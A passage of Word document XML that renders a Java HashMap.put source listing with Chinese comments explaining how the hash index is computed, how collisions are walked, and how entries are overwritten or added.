          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>重新计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>值。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> hash = hash(key.hashCode());  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>搜索指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>值在对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>中的索引。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> i = indexFor(hash, table.length);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>索引处的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>不为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>，通过循环不断遍历</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>元素的下一个元素。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (Entry&lt;K,V&gt; e = table[i]; e != </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>; e = e.next) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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Object k;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>如果发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> i </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>索引处的链表的某个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>和新</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>相等且两者的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>相同，则新</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>覆盖旧</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>，返回。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k))) {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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V oldValue = e.value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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e.value = value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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e.recordAccess(</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> oldValue;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>索引处的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>，表明此处还没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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modCount++;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>添加到</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>索引处。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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addEntry(hash, key, value, i);  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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return</w:t>
